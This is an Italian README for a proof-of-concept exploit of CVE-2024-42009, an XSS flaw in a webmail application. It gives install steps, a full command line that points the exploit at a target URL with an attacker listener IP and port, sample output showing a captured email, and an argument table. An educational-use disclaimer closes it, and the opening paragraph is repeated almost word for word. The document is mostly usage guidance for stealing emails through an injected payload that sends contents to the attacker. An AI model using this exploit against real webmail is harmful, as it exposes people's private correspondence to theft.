
Questo Proof of Concept (PoC) dimostra un exploit per CVE-2024-42009, sfruttando una vulnerabilità di cross-site scripting (XSS) per estrarre email da un'applicazione webmail target. L'attacco inietta un payload dannoso che esfiltra il contenuto delle email verso un listener controllato dall'attaccante.
Questa Proof of Concept (PoC) dimostra un exploit per CVE-2024-42009, sfruttando una vulnerabilità di cross-site scripting (XSS) per estrarre email da un'applicazione webmail target. L'attacco inietta un payload malevolo che esfiltra il contenuto delle email verso un listener controllato dall'attaccante.
pip install requests beautifulsoup4
Esegui lo script con gli argomenti necessari:
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)
[+] Captured Email Content:
Hello, this is a test email!
Non rivendico credito/proprietà/divulgazione della vulnerabilità e di tutti gli exploit corrispondenti ospitati in questo repository GitHub - Tutti i crediti al ricercatore che l'ha scoperta; ho solo creato una POC per replicare la vulnerabilità basandomi sui dati provenienti da internet. Questa PoC è solo a scopo educativo e di ricerca. Test non autorizzati su sistemi senza consenso sono illegali. Usala in modo responsabile!
| Argomento | Descrizione |
|---|
-fu, --from-user | L'indirizzo email del mittente |
-tu, --to-user | L'indirizzo email del destinatario |
-u, --target-url | L'URL della webmail di destinazione |
-ip, --server-ip | L'indirizzo IP del listener dell'attaccante |
-p, --server-port | La porta per il listener (default: 1337) |